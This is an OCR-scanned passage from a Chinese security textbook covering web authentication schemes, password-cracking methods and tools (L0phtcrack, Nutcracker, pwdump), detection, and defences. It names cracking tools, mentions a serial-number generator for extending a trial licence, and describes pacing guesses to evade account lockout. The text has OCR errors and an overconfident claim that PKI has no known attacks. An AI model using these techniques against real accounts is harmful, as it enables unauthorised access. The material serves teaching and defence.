基础 认证 发 送 以 Base 64 编码 的 用 户 名 和 密码 不 同 ， 在 摘要 认证 中 服务 器 让 客户 选 一 个 随机 
数 ( 称 作 “nonce”)， 然 后 浏览 器 使 用 一 个 单 向 的 加 密 函 数 生成 一 个 消息 摘要 (message digest), 
该 摘要 是 关于 用 户 名 、 密 码 、 给 定 的 nonce 值 、HTTP 方法 ， 以 及 所 请 求 的 URL。 消 息 摘要 
函数 也 被 称 为 散 列 算法 ， 是 一 种 在 一 个 方向 上 很 容易 计算 ， 反 方向 却 不 可 行 的 加 密 算法 。 与 
基础 认证 对 比 ， 解 码 基 础 认证 中 的 Base 64 是 很 容易 办 到 的 。 在 服务 器 口令 中 ， 可 以 指定 任 
意 的 散 列 算法 。 

摘要 认证 具有 下 述 特点 : 

1) 该 认证 基于 质询 /响应 认证 模型 ; 

2) 用 户 发 出 不 带 认证 凭据 的 请 求 ，Web 服务 器 回应 一 个 指示 凭据 的 WWW 认证 头 ; 

3) 取代 发 送 用 户 名 和 口令 ， 服 务 器 使 用 一 个 随机 值 询问 客户 端 ; 

4) 客户 端 使 用 用 户 名 /口令 的 消息 摘要 应 答 服务 器 。 

与 基本 认证 模式 相同 , 摘要 认证 必须 预先 定义 用 户 名 和 口令 。 这 是 一 个 基于 口令 的 系统 ， 
面临 着 所 有 基于 口令 系统 相同 的 问题 。 特 别 是 ， 这 种 协议 没有 定义 如 何在 建立 口令 时 保护 它 
的 安全 。 

实现 中 可 选择 不 接受 以 前 使 用 过 的 唯一 值 或 以 前 使 用 过 的 摘要 ， 目 的 是 阻止 重 放 攻击 。 
实现 中 也 可 以 选择 使 用 一 次 一 个 唯一 值 或 一 次 一 个 摘要 的 方式 。 这 个 唯一 值 对 于 客户 端 来 说 
是 透明 的 ， 它 由 服务 器 指定 ， 客 户 端 只 是 不 加 修改 地 把 它 返回 给 服务 器 。 尽 管 这 种 认证 模式 
中 没有 实际 发 送 口令 ， 但 发 送 了 它 的 消息 摘要 ， 攻 击 者 能 利用 生成 的 消息 摘要 来 获取 对 内 容 
的 访问 ， 原 因 在 于 口令 摘要 是 访问 这 样 的 网 站 唯一 所 需 的 信息 。 

3. NTLM 认证 


NTLM(NTLanMan) 是 一 个 基于 质询 /响应 模式 进行 用 户 和 计算 机 认证 的 微软 专用 协议 。 

NTLM 具有 下 述 特点 : 

1) NTLM 认证 是 微软 专用 的 NT LAN Manager 认证 ， 它 只 适用 于 Microsoft Internet 
Explorer: 

2) 集成 的 Windows 认证 的 工作 方式 与 消息 摘要 认证 相同 。 

在 认证 过 程 开始 时 , 用 户 的 系统 (客户 端 ) 向 telnet 服务 器 发 送 一 条 登录 请 求 , 服务 器 使 用 
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随机 生成 的 “ 令 牌 ”( 质 询 值 ) 应 答 客户 端 。 客 户 端 使 用 质询 值 对 当前 登录 用 户 加 密 保护 的 口 
令 进 行 散 列 化 ， 并 把 散 列 结果 发 送 给 服务 器 。 服 务 器 收 到 质询 散 列 的 响应 之 后 ， 将 它 与 已 知 
的 正确 响应 相 比 较 , 如 果 两 者 匹配 , 那么 用 户 认 证 成 功 。 但 是 , 这 种 做 法 并 不 安全 , 因为 NTLM 
散 列 值 能 够 被 暴力 破解 。 

4. 数字 证 书 认 证 

数字 证 书 是 一 个 电子 文档 ， 它 包含 了 身份 信息 、 公 钥 并 使 用 认证 中 心 私 钥 签署 的 数字 签 
名 。 希望 发 送 解 密 消息 的 个 体 向 认证 中 心 (CA，Certificate Authority) 申 请 数字 证 书 。 认 证 中 心 
是 一 个 签署 证 书 的 权威 机 构 ， 它 能 担保 证 书 持 有 人 的 身份 。CA 发 行 的 加 密 数 字 证 书 中 包含 
了 申请 人 的 公 钥 及 其 他 各 种 身份 信息 ， 它 通过 印刷 媒体 或 互联 网 公布 自己 的 公 钥 。 

数字 证 书 认证 具有 下 述 特点 : 

1) 数字 证 书 认 证 比 其 他 形式 的 认证 更 健壮 ; 

2) 数字 证 书 认 证 使 用 了 公开 密 钥 密码 学 ,数字 证 书 能 够 存储 在 智能 卡 上 ， 从 而 进一步 提 
高 安全 性 ; 

3) 目前 尚 不 知道 存在 针对 PKI 安全 的 攻击 。 

当 用 户 连接 到 服务 器 上 进行 认证 时 ， 他 向 服务 器 提供 自己 的 数字 证 书 ， 证 书 中 包含 了 公 
钥 和 CA 签名 。 服 务 器 首先 验证 证 书 上 的 签名 是 否 有 效 、 是 否 由 信任 CA 生成 。 通 过 后 ， 服 
务 器 使 用 公开 密 钥 加 密 算法 认证 用 户 ， 证 实 其 确实 拥有 与 该 证 书 相 关联 的 私 钥 。 加 密 消 息 的 
接收 方 使 用 CA 的 公 钥 解密 附着 在 消息 上 的 数字 证 书 ， 验 证 它 的 真 伪 。 通 过 后 ， 得 到 包含 在 
证 书 中 的 发 送 方 的 公 钥 和 身份 信息 。 利 用 这 些 信息 ， 接 收 方 可 发 送 一 个 加 密 应 答 。 数 字 证 书 
应 经 得 到 了 广泛 的 使 用 ， 下 面 是 在 认证 中 使 用 数字 证 书 的 一 些 示 例 : 

1) 电子 邮件 : 很 多 人 使 用 数字 证 书 来 加 密 电子 邮件 (提供 机 密 性 ) 或 签署 电子 邮件 (证 实 
身份 )。 

2) 网 络 安全 : 很 多 机 构 (包括 一 些 网 上 银行 ) 都 部 署 了 使 用 数字 证 书 的 智能 卡 或 其 他 安全 
技术 ， 以 此 作为 提高 他 们 的 计算 机 网 络 安 全 性 的 一 种 途径 。 

5. 表单 认证 


通常 情况 下 ，Web 应 用 程序 用 来 认证 自己 用 户 的 凭据 是 Web 表单 ， 它 同时 也 决定 着 用 
户 的 授权 级 别 。 表 单 认证 具有 下 述 特点 : 
。 这 是 一 种 高 度 可 定制 的 认证 机 制 ， 它 使 用 HTML 中 的 <FORM> 和 <INPUT> 标 记 构 造 
表单 ， 形 成 供用 户 输 入 其 用 户 名 /口令 的 字段 。 
。 在 用 户 输入 了 用 户 名 /口令 ， 通 过 HTTP 或 SSL 发 送 给 服务 器 之 后 ， 服 务 器 端的 业务 
逻辑 评估 用 户 名 /口令 的 有 效 性 ， 如 果 凭据 有 效 ， 服 务 器 就 向 客户 端 发 送 一 个 cookie; 
以 便 随 后 的 页 面 访问 。 
。 表单 认证 技术 是 互联 网 上 流行 的 认证 技术 。 
。 客户 端 生成 访问 保护 资源 (比如 交易 细节 ) 的 请 求 。 
* IIS(Intemet Information ServeD 收 到 请 求 。 如 果 请 求 的 客户 端 得 到 了 IS 的 认证 ， 那 么 
户 /客户 端 进入 到 Web 应 用 中 。 如 果 打 开 了 匿名 访问 支持 ， 客 户 端 默认 地 进入 到 
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Web 应 用 中 。 否 则 ，Windows 提示 用 户 输入 访问 服务 器 资源 的 凭证 。 

。 如 果 客户 端 不 包括 有 效 的 认证 凭据 Cookie, Web 应 用 将 用 户 带 到 提示 用 户 输入 凭证 
的 页 面 。 

。 在 提供 所 需 凭证 后 ， 用 户 得 到 Web 应 用 的 认证 。Web 应 用 确定 了 请 求 的 授权 级 别 。 
如 果 客 户 端 被 授予 访问 安全 资源 的 权限 ， 认 证 凭据 最 终 被 分 配给 客户 端 。 如 果 认 证 
失败 ， 将 向 客户 端 返 回 拒绝 访问 的 消息 。 


633 口令 破解 方式 及 工具 


了 解 口令 的 加 密 方 式 后 ， 我 们 讨论 一 下 目前 主流 的 口令 破解 方式 。 

1. 通过 网 络 监听 非法 得 到 用 户口 令 , 这 类 方法 危害 性 极 大。 监听 者 往往 采用 中 途 截击 的 
方法 ， 也 是 获取 用 户 账户 和 密码 的 一 条 有 效 途径 。 当 前 ， 很 多 协议 没有 采用 任何 加 密 或 身份 
认证 技术 ， 如 在 Telnet, FTP, HTTP, SMTP 等 传输 协议 中 ， 用 户 账户 和 密码 信息 都 是 以 明 
文 格式 传输 的 ， 此 时 若 攻击 者 利用 数据 包 截取 工具 便 可 很 容易 收集 到 你 的 账户 和 密码 。 还 有 
一 种 中 途 截击 攻击 方法 ， 它 在 你 和 服务 器 端 完成 “三 次 握手 ”建立 连接 之 后 ， 在 通信 过 程 中 
扮演 “第 三 者 ”的 角色 ， 先 假冒 服务 器 身份 欺骗 你 ， 然 后 再 假冒 你 向 服务 器 发 出 恶意 请 求 ， 
其 造成 的 后 果 不 堪 设想 。 另 外 ， 攻 击 者 有 时 还 会 利用 软件 和 硬件 工具 时 刻 监视 系统 主机 的 工 
作 ， 等 待 记录 用 户 登 录 信 息 ， 从 而 取得 用 户 密码 ， 或 者 编制 有 缓冲 区 溢出 错误 的 SUID 程序 
来 获得 超级 用 户 权限 。 

2. 在 知道 用 户 的 账号 后 (如 电子 邮件 @ 前 面 的 部 分 ) 利 用 一 些 专门 软件 强行 破解 用 户口 
令 ， 这 种 方法 不 受 网 段 限制 ， 但 攻击 者 要 有 足够 的 耐心 和 时 间 。 如 : 采用 字典 穷 举 法 (或 称 暴 
力 法 ) 来 破解 用 户 的 密码 。 攻 击 者 可 以 通过 一 些 工 具 程序 , 自动 地 从 电脑 字典 中 取出 一 个 单词 ， 
作为 用 户 的 口令 ， 再 输入 给 远 端 的 主机 ， 申 请 进入 系统 ， 若 口令 错误 ， 就 按 序 取出 下 一 个 单 
词 ， 进 行 下 一 个 尝试 ， 并 一 直 循环 下 去 ， 直 到 找到 正确 的 口令 或 字典 的 单词 试 完 为 止 。 由 于 
这 个 破译 过 程 由 计算 机 程序 来 自动 完成 ， 因 而 几 个 小 时 就 可 以 把 上 十 万 条 记录 的 字典 里 所 有 
单词 都 尝试 一 遍 。 

3. 利 用 系统 管理 员 的 失误 。 在 现代 的 UNIX 操作 系统 中 , 用 户 的 基本 信息 存放 在 passwd 
文件 中 ， 而 所 有 的 口令 则 经 过 DES 加 密 方法 加 密 后 专门 存放 在 一 个 叫 shadow 的 文件 中 。 攻 
击 者 获取 口令 文件 后 ， 就 会 使 用 专门 的 破解 DES 加 密 法 的 程序 来 解密 口令 。 同 时 ， 由 于 为 数 
不 少 的 操作 系统 都 存在 许多 安全 漏洞 、Bug 或 一 些 其 他 设计 缺陷 ， 这 些 缺 陷 一 旦 被 找 出 ， 攻 
击 者 就 可 以 长 驱 直 入 。 

目前 口令 破解 工具 所 遵循 的 攻击 策略 大 多 数 都 是 字典 攻击 、 暴 力 攻击 以 及 混合 攻击 。 字 
典 攻击 就 是 攻击 者 使 用 一 个 包含 大 多 数 词典 单词 的 文件 ， 用 这 些 单词 猜测 用 户口 令 。 使 用 一 
部 1 万 个 单词 的 词典 一 般 能 猜测 出 系统 中 70% 的 口令 。 在 多 数 系统 中 ， 和 尝试 所 有 的 组 合 相 
比 ， 词 典 攻击 能 在 很 短 的 时 间 内 完成 。 暴 力 攻击 也 就 是 常 说 的 穷 举 攻击 方式 。 如 果 字 典 攻 击 
仍然 不 能 够 成 功 ， 入 侵 者 会 采取 穷 举 攻击 。 一 般 从 长 度 为 1 的 口令 开始 ， 按 长 度 递增 进行 党 
试 攻击 。 由 于 人 们 往往 偏爱 简单 易 记 的 口令 ， 穷 举 攻击 的 成 功率 很 高 。 如 果 每 千 分 之 一 秒 检 
查 一 个 口令 , 那么 86% 的 口令 可 以 在 一 周 内 破译 出 来 。 混合 攻击 结合 了 字典 攻击 和 穷 举 攻击 ， 
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先 字典 攻击 ， 再 暴力 攻击 。 常 见 的 口令 破解 工具 如 下 : 
1. LOphtcrack 


如 果 不 喜欢 使 用 命令 行 工具 破解 口令 ， 那 么 可 以 使 用 LOphtcrack， 它 也 称 为 LC5， 是 一 
个 用 于 破解 Windows 口令 的 图 形 用 户 界面 工具 。LOphtcrack 曾 是 市 场 上 最 著名 的 口令 破解 工 
具 ， 它 最 初 由 @Stake 公司 开发 ， 于 2004 年 被 Symantec 公司 收购 ， 从 2006 开始 ，Symantec 
不 再 发 行 LC5， 但 依然 可 从 网 络 上 找到 LCS 安装 程序 ， 这 是 一 个 15 天 的 试用 版 本 ， 但 从 网 
上 可 以 找到 一 个 该 工具 的 序列 号 生成 器 ， 从 而 更 长 时 间 地 应 用 这 个 工具 。 由 于 LC5 已 经 不 再 
得 到 开发 支持 ， 也 可 改 用 Cain and Abel. John the Ripper 或 Ophcrack 进行 口令 破解 。 

利用 LOphtcrack， 能 够 完成 下 述 任务 : 

1) 破解 本 地 计算 机 的 口令 ; 

2) 破解 远程 计算 机 的 口令 ; 

3) 通过 使 用 NT4.0ERD 破解 口令 ; 

4) 通过 嗅 探 网 络 破解 口令 。 

LOphtcrack 能 够 进行 字典 攻击 、 混 合 攻击 和 暴力 攻击 ， 它 还 能 够 评价 口令 的 难度 ， 这 将 
有 助 于 编写 渗透 测试 报告 。 

2. Nutcracker 


Linux 和 其 他 UNIX 变种 在 口令 加 密 过 程 中 使 用 了 加 盐 , 目的 是 为 了 让 口令 被 难以 破解 。 
不 要 受 人 为 破解 Linux 和 其 他 UNIX 变种 平台 的 口令 速度 很 慢 这 一 点 的 迷惑 ， 对 /etc/shadow 
文件 依然 可 以 进行 快速 的 字典 攻击 。 

Nutcracker 或 许 是 速度 最 快 的 UNIX/Linux 口令 破解 器 ， 这 个 工具 由 了 Ryan Rhea 开发 。 由 
于 Nutcracker 是 一 个 字典 破解 程序 ， 因 此 要 求 使 用 字典 文件 。Nutcracker 本 身 携带 了 一 个 包 
含 2400 个 词汇 的 示例 字典 ， 但 必要 时 应 该 创建 自己 的 字典 。 

3. Snadboy Revelation 


很 多 应 用 程序 都 提供 了 保存 口令 的 选项 ， 这 个 做 法 很 危险 ， 原 因 在 于 能 登录 计算 机 的 任 
何人 都 可 以 不 加 认证 地 登录 到 这 样 的 应 用 程序 中 。 更 大 的 危险 在 于 ， 人 们 经 常 重用 口令 ， 这 
就 是 说 ， 如 果 有 人 掌握 了 一 个 人 在 某 个 应 用 程序 中 使 用 的 口令 ， 那 么 它 就 很 有 可 能 使 用 这 个 
口令 登录 到 此 人 所 使 用 的 其 他 应 用 程序 中 。 

Revelation 是 一 个 提取 隐藏 口令 的 工具 , 隐藏 的 口令 通常 在 界面 上 显示 为 一 连 串 的 星 号 (9 
或 号。 假如 一 个 应 用 程序 使 用 了 用 户 名 andrew 和 口令 1r66nbg。 虽 然 它 的 口令 被 显示 为 一 
串 X, {H Revelation 依然 得 到 并 显示 了 这 个 应 用 程序 的 口令 。 由 于 人 们 通常 会 重用 口令 ， 因 
此 可 将 这 个 口令 应 用 到 该 用 户 会 使 用 的 其 他 应 用 程序 上 ， 如 电子 邮件 或 记 账 软件 上 。 

4. Boson GetPass 一 破解 Cisco 路 由 器 口令 

本 节 前 面 介 绍 的 内 容 都 是 阑 述 UNIX 和 Windows 系统 中 口令 破解 的 工具 。 网 络 上 的 其 他 
主机 也 有 口令 ， 特 别 是 ，Cisco 路 由 器 包含 了 恶意 攻击 者 能 够 破解 并 获取 访问 权 的 口令 。 为 
了 评估 恶意 攻击 成 功 的 可 能 性 ， 渗 透 测试 人 员 也 必须 对 这 类 设备 的 口令 进行 破解 。 
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在 介绍 如 何 破解 Cisco 设备 口令 之 前 ， 我 们 需要 了 解 Cisco 口令 的 工作 方式 。Cisco 路 
器 具有 两 种 运行 模式 : 

1) 用 户 执行 模式 (User exec mode) 一 一 用 户 执行 模式 就 像 旅店 的 大 厅 ， 可 以 进去 看 一 看 ， 
但 做 不 了 什么 事情 。 在 用 户 执行 模式 下 可 以 查看 界面 的 状态 、 路 由 表 以 及 执行 其 他 信息 收集 
任务 ， 但 不 能 进行 配置 ; 
2) 特权 执行 模式 (Privileged exec mode) 一 一 特权 执行 模式 就 像 拥有 了 旅馆 中 能 够 打开 所 
有 房间 大 门 的 万 能 钥匙 一 样 ， 可 以 做 自己 想 做 的 一 切 事情 。 在 获取 特权 执行 模式 后 ， 就 可 以 
完整 访问 路 由 器 的 配置 。 在 用 户 执行 模式 转移 到 特权 执行 模式 时 可 以 设置 口令 。 因 此 ， 保 护 
好 这 个 口令 对 保护 路 由 器 的 安全 至 关 重要 。 进 入 特权 执行 模式 时 有 两 种 方式 提供 口令 : 明文 
口令 支持 和 秘密 口令 支持 。 


6.34 口令 破解 检测 技术 


由 于 口令 攻击 有 多 种 方式 ， 因 此 检测 口令 破解 也 是 非常 困难 的 。 当 攻击 者 进行 标准 的 暴 
力 破解 或 字典 口令 破解 时 ， 他 通常 要 向 目标 发 送 成 千 上 万 的 可 能 用 户 名 和 口令 进行 尝试 。 当 
某 个 用 户 名 /口令 组 破解 成 功 后 ， 攻 击 者 就 会 开始 下 一 步 工作 ， 获 取 系统 的 访问 。 攻 击 者 破解 
口令 的 另 一 种 方法 是 获取 系统 的 物理 访问 ， 然 后 盗窃 口令 文件 和 数据 库 。 如 果 所 有 这 些 工 作 
都 过 于 困难 而 无 法 完成 时 ， 攻 击 者 就 会 转向 实施 最 基础 的 社会 工程 攻击 。 下 面 介绍 能 够 用 于 
检测 口令 破解 攻击 的 一 些 位 置 和 方法 。 

1. 网 络 流量 


在 交换 网 络 中 , 如 果 没 有 支持 SPAN 端口 的 合适 设备 , 监控 网 络 流量 就 是 件 困 难 的 事情 。 
在 克服 了 这 个 障碍 之 后 ， 可 以 使 用 网 络 嗅 探 器 将 所 有 流量 记录 到 硬盘 上 ， 用 于 以 后 的 分 析 。 
前 面 曾经 提 到 , 口令 猜测 会 在 短 时 间 内 向 目标 系统 发 送 成 千 上 万 的 测试 用 户 名 和 口令 。 比 如 ， 
可 让 Brutus 使 用 字典 口令 猜测 方法 猜测 任何 Telnet 服务 器 的 口令 ， 如 Windows Server 或 PIX 
Firewall。 在 这 样 的 攻击 中 ，Brutus 能 在 最 短 时 间 内 发 送 尽 可 能 多 的 用 户 名 和 口令 ， 通 过 运用 
网 络 嗅 探 器 能 够 发 现 这 类 大 量 出 现 的 攻击 企图 。 在 正常 的 运行 过 程 中 ， 登 录 并 不 集中 ， 而 是 
零散 的 。 因 此 ， 当 某 台 机 器 短 时 间 内 发 出 大 量 登 录 尝 试 时 ， 就 可 以 认为 发 生 了 攻击 者 攻击 。 
但 是 ， 这 种 方法 需要 耗费 大 量 时 间 ， 因 此 通常 在 使 用 其 他 方法 发 现 了 攻击 企图 后 再 采用 这 个 
方法 进一步 跟踪 攻击 。 

2. 系统 日 志文 件 


检测 登录 失败 的 男 一 个 更 好 的 位 置 是 目标 计算 机 的 系统 安全 日 志文 件 。 当 打开 记录 失败 
登录 请 求 后 ， 日 志文 件 提供 了 登录 尝试 的 详细 信息 ， 包 括 时 间 、 日 期 、 用 户 名 等 。 典 型 情况 
下 会 看 到 大 量 的 登录 企图 。 

3. 应 对 账户 锁定 

在 运用 口令 猜测 过 程 中 ， 攻 击 者 都 会 遇 到 一 个 “账户 锁定 ”问题 。 默 认 情 况 下 ， 不 管用 
户 账户 尝试 登录 了 多 少 次 , 标准 Windows 计算 机 都 不 会 锁定 用 户 账户 。 具 有 这 种 默认 设置 的 
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系统 是 攻击 者 梦 襟 以 求 的 系统 ， 它 可 以 花费 数 日 时 间 来 攻击 同一 个 账户 ， 如 administrator 
直到 成 功 为 止 。 

素质 良好 的 系统 管理 员 会 手工 配置 登录 设置 ， 如 每 发 现 5 次 连续 的 失败 登录 ， 就 锁定 上 
户 账户 30 分 钟 。 当 脚本 小 子 遇 到 账户 锁定 时 , 他 们 通常 就 会 转移 到 攻击 用 户 列表 中 的 下 一 个 
用 户 。 他 们 一 直 使 用 这 个 账户 ， 直 到 该 账户 被 锁定 为 止 。 最 后 ， 目 标 系统 的 管理 员 将 会 听 到 
合法 用 户 抱怨 不 能 登录 系统 。 如 果 很 多 人 都 在 抱怨 不 能 登录 时 ， 这 就 是 口令 猜测 攻击 正在 进 
行 的 明显 信号 。 这 种 方法 也 是 针对 办 公 环 境 进行 拒绝 服务 攻击 的 一 种 卑 吕 手 段 。 当 锁定 了 系 
统 的 每 个 账户 之 后 ， 工 作 就 会 被 中 断 至 少 30 分 钟 ,， 任何 用 户 都 无 法 登录 ， 除非 其 间 管 理 员 手 
工 解锁 账户 。 那 么 攻击 者 高 手 会 怎么 做 呢 ? 攻击 者 高 手 最 多 锁定 账户 一 次 ， 或 者 根本 就 不 会 
锁定 账户 。 假 设 锁定 设置 为 5， 攻击 者 高 手 会 缓慢 地 攻击 3-4 次 ， 然 后 等 待 30 分 钟 的 时 间 ， 
再 进行 下 一 轮 攻击 。 经 过 一 周 或 一 个 月 的 时 间 ， 他 最 终 会 获取 系统 的 访问 权 。 因 此 ， 即 使 已 
经 设置 了 账户 锁定 策略 ， 也 要 经 常 观 察 一 下 日 志文 件 ， 看 是 否 存在 问题 。 


4. 物理 访问 


检测 口令 文件 (比如 Windows SAM 文件 或 Linux shadow 文件 ) 的 物理 丢失 十 分 困难 。 当 
这 样 的 文件 失窃 后 ， 攻 击 者 可 以 在 自己 家 中 耗费 任意 长 短 的 时 间 来 破解 其 中 的 口令 。 口 令 文 
件 丢失 的 标识 包括 ， 破 门 进入 办 公 室 、 笔 记 本 或 其 他 电脑 丢失 、 备 份 磁带 丢失 、 陌 生 的 管理 
员 账 户 活动 等 。 某 次 事故 后 不 久 ， 目 标 系统 管理 员 发 现 用 户 在 不 正常 的 时 间 登 录 系统 ， 这 也 
表示 攻击 者 对 口令 文件 进行 了 破解 。 

5. 垃圾 搜寻 和 按键 记录 


垃圾 搜寻 和 按键 记录 也 可 以 被 归 类 为 物理 访问 。 垃 圾 搜寻 包括 从 垃圾 箱 中 翻 检 旧 硬盘 、 
便签 及 可 以 用 于 搜寻 用 户 名 和 口令 的 其 他 东西 。 如 果 系统 管理 员 某 一 天 上 班 后 发 现 停车 场 或 
办 公 室 的 垃圾 箱 周围 垃圾 四 溅 ， 通 常 就 可 能 是 业余 攻击 者 在 垃圾 中 搜索 用 户 名 和 口令 。 

按键 记录 器 是 攻击 者 安装 的 一 种 软件 或 者 是 某 种 智能 设备 ， 它 安装 在 计算 机 和 键盘 之 
间 ， 看 起 来 像 键盘 适配器 。 利 用 这 些 设 备 ， 攻 击 者 能 够 捕获 键盘 上 发 出 的 每 一 个 按键 。 现 在 
有 一 些 可 以 检测 软件 按键 记录 器 的 软件 ， 但 硬件 按键 记录 器 则 难以 检测 。 作 为 管理 员 ， 应 该 
每 天 巡视 服务 器 的 连接 ， 以 便 发 现 可 能 安装 的 物理 按键 记录 器 。 与 其 他 物理 访问 相似 ， 按 键 
记录 器 也 不 容易 被 发 现 。 

6. 社会 工程 

最 难 监测 的 方法 之 一 实际 上 是 社会 工程 。 攻 击 者 可 以 通过 训练 有 素 的 技巧 ， 使 用 电话 直 
接 询问 用 户 的 用 户 名 和 口令 ， 借 口 通常 是 系统 维护 ， 没 有 经 过 安全 训练 的 用 户 会 轻信 这 样 的 
电话 ， 给 出 自己 的 用 户 名 和 口令 。 这 样 的 方式 更 难以 检测 ， 只 有 等 用 户 将 这 样 的 情况 报告 安 
全 小 组 的 管理 员 之 后 ， 才 会 发 现 丢 失 了 用 户 名 和 口令 ， 而 发 现 这 个 事情 时 ， 往 往 系统 已 经 被 
清洗 一 遍 了 。 
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6.3.5 口令 破解 的 防范 


避免 口令 破解 很 困难 ， 基 本 上 不 能 够 完全 阻止 口令 破解 ， 因 为 这 方面 的 工作 涉及 方 方 面 
mio 下面 介绍 一 些 防范 口令 破解 的 技术 和 方法 , 虽然 这 些 技术 和 方法 不 能 彻底 阻止 口令 破解 ， 
但 能 使 破解 变 得 困难 ， 从 而 让 它 成 为 一 条 攻击 者 不 能 攻击 系统 的 途径 。 这 些 方 法 有 些 来 自 于 
经 验 积累 ， 因 此 实现 的 程度 依赖 于 具体 环境 的 要 求 。 

1. 口令 审计 


即使 是 没有 几 个 人 的 办 公 室 ， 也 应 该 定期 进行 口令 审计 。 安 全 专业 人 员 应 该 建议 用 户 使 
用 长 度 较 长 的 复杂 口令 ， 因 为 口令 过 短 则 十 分 容易 被 破解 。 比 如 ， 一 个 简单 的 7 字符 口令 数 
小 时 就 能 够 破解 出 来 , 而 要 破解 一 个 14 个 字符 长 度 的 口令 可 能 要 耗费 数 月 的 时 间 。 审计 有 助 
于 管理 员 迅 速 找到 口令 中 的 弱点 。 

2. 记录 账户 登录 日 志 与 账户 锁定 策略 


基本 上 所 有 系统 (包括 Windows 和 UNIX 操作 系统 、 路 由 器 、 防 火 墙 及 其 他 可 管理 设备 
先 ) 都 实现 了 记录 账户 登录 日 志 的 功能 。 如 果 我 们 不 记录 失败 登录 尝试 ， 那 么 可 能 永远 也 不 会 
发 现 攻击 者 从 早 到 晚 尝试 进入 系统 的 企图 。 路 由 器 和 防火 寺 的 日 志 配置 比较 简单 ， 参 考 一 下 
相应 的 帮助 文件 即 可 。Windows 系统 可 以 配置 为 在 安全 事件 日 志 中 同时 记录 成 功 登 录 和 失败 
登录 事件 。 总 之 ， 不 管 使 用 什么 方法 ， 一 定 要 确保 最 终 收集 了 所 有 服务 器 上 的 日 志 。 

防止 口令 破解 的 一 种 不 错 方法 就 是 用 户 账户 锁定 策略 。 例 如 ， 在 账户 锁定 之 前 ， 李 明 每 
分 名 能够 进行 1000 次 口令 尝试 ， 但 在 使 用 了 账户 锁定 后 ， 要 党 试 1000 次 口令 猜测 ， 需 要 花 
费 125 个 小 时 。 然 而 ， 攻 击 者 可 以 利用 账户 锁定 的 这 个 特性 来 发 起 Dos 攻击 ,然后 通过 其 他 
渠道 获取 口令 ， 如 通过 运用 社会 工程 。 

3. 口令 设置 与 物理 保护 


与 账户 锁定 一 起 设置 的 选项 还 包括 口令 长 度 、 历 史 及 口令 过 期 时 间 。 口 令 越 长 、 越 复杂 ， 
口令 被 猜 中 的 可 能 性 就 越 小 。 微软 Windows 系统 提供 了 这 些 选项 设置 , 不 过 , 在 默认 安装 时 ， 
它们 都 是 关闭 的 ， 也 就 是 说 ， 这 些 系 统 允 许 0 长 度 口令 ， 也 不 提醒 用 户 更 换 口令 。 

怎么 强调 服务 器 和 客户 端 计算 机 的 物理 保护 都 不 过 分 。 攻 击 者 所 使 用 的 所 有 工具 都 需要 
得 到 SAM 数据 库 、shadow 文件 的 备份 , 或 者 从 这 些 文件 中 提取 出 数据 。 在 获得 这 些 信息 后 ， 
就 可 以 进行 脱 机 暴力 破解 了 。 当 拥有 了 管理 员 权限 后 ， 可 使 用 pwdump3、pwdump6 这 样 的 
工具 跨越 网 络 或 从 本 地 主机 上 提取 出 SAM 的 内 容 。 但 是 ， 如 果 攻 击 者 没有 管理 员 权 限 ， 就 
无 法 从 网 络 口令 文件 中 得 到 用 户 名 和 口令 。 

4. 员工 安全 教育 和 策略 

向 员工 提供 口令 破解 的 风险 信息 及 口令 破解 的 难 易 程度 ， 雇 员 就 有 机 会 认识 到 口令 的 重 
要 性 。 实 现 口令 设置 建议 及 更 换 口 令 的 过 程 有 助 于 击 退 破解 者 的 攻击 ， 甚 至 击败 社会 工程 的 
攻击 。 社 会 工程 攻击 难以 防御 ， 特 别 是 用 户 没有 得 到 系统 的 风险 培训 时 更 是 如 此 。 不 管 公司 
的 大 小 ， 都 应 该 教育 员工 使 用 唯一 口令 、 不 把 口令 写 下 来 、 不 向 任何 人 披露 口令 及 用 户 名 。 
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在 正常 的 办 公 环 境 中 ， 绝 大 多 数 员工 在 日 常 工作 中 都 不 关心 安全 问题 ， 当 然 系 统管 理 员 
例外 。 应 该 教育 网 络 用 户 关注 安全 问题 ， 并 使 每 个 元 素 都 保持 安全 状态 。 办 公 室 都 应 该 实现 
安全 警示 制度 。 保 护 口令 安全 、 减 少 口令 破解 机 会 的 措施 包括 下 面 内 容 

。 解释 原因 : 负责 安全 的 领导 十 分 关注 口令 安全 ;屏幕 保护 口令 很 重要 ;应 该 使 用 比 

较 长 的 口令 ;使 用 BIOS 口令 。 

。 应 该 告诉 用 户 避 免 发 生 下 述 事 件 ， 所 有 地 方 都 使 用 相同 的 口令 ;使 用 任何 形式 的 增 

量 口令 ， 如 第 一 次 使 用 了 口令 abcd123， 下 一 次 使 用 abcd124 等 ， 把 口令 写 到 纸 上 ; 
在 家 里 的 计算 机 上 和 办 公 室 的 计算 机 上 使 用 相同 的 口令 ， 安 装 非 授 权 软 件 ， 向 其 他 
任何 人 披露 口令 ， 对 电话 询问 用 户 账户 和 口令 问题 作出 回答 。 

员工 安全 培训 有 助 于 减少 可 能 的 社会 工程 攻击 ， 帮 助 用 户 理解 为 什么 要 制定 这 样 的 规 
则 。 当 用 户 理解 了 这 些 规则 的 内 涵 后 ， 他 们 就 更 可 能 遵守 这 些 规 则 。 


64 网络 安全 扫描 


网 络 安全 扫描 技术 是 一 种 基于 Intemet 远程 检测 目标 网 络 或 本 地 主机 安全 性 脆弱 点 的 技 
术 。 通 过 网 络 安全 扫描 ， 系 统管 理 员 能 够 发 现 所 维护 的 Web 服务 器 的 各 种 TCP/IP 端口 的 分 
配 、 开 放 的 服务 、Web 服务 软件 版 本 和 这 些 服务 及 软件 呈现 在 Intemet 上 的 安全 漏洞 。 网 络 
安全 扫描 技术 也 是 采用 积极 的 、 非 破坏 性 的 办 法 来 检验 系统 是 否 有 可 能 被 攻击 崩溃 。 它 利用 
了 一 系列 的 脚本 模拟 对 系统 进行 攻击 的 行为 ， 并 对 结果 进行 分 析 。 这 种 技术 通常 被 用 来 进行 
模拟 攻击 实验 和 安全 审计 。 网 络 安全 扫描 技术 与 防火 墙 、 安 全 监控 系统 互相 配合 就 能 够 为 网 
络 提供 很 高 的 安全 性 。 一 次 完整 的 网 络 安全 扫描 分 为 三 个 阶段 : 

第 一 阶段 :发 现 目标 主机 或 网 络 ; 

第 二 阶段 : 发现 目 标 后 进一步 搜集 目标 信息 ， 包 括 操作 系统 类 型 、 运 行 的 服务 以 及 服务 
软件 的 版 本 等 。 如 果 目 标 是 一 个 网 络 ， 还 可 以 进一步 发 现 该 网 络 的 拓扑 结构 、 路 由 设备 以 及 
各 主机 的 信息 ; 

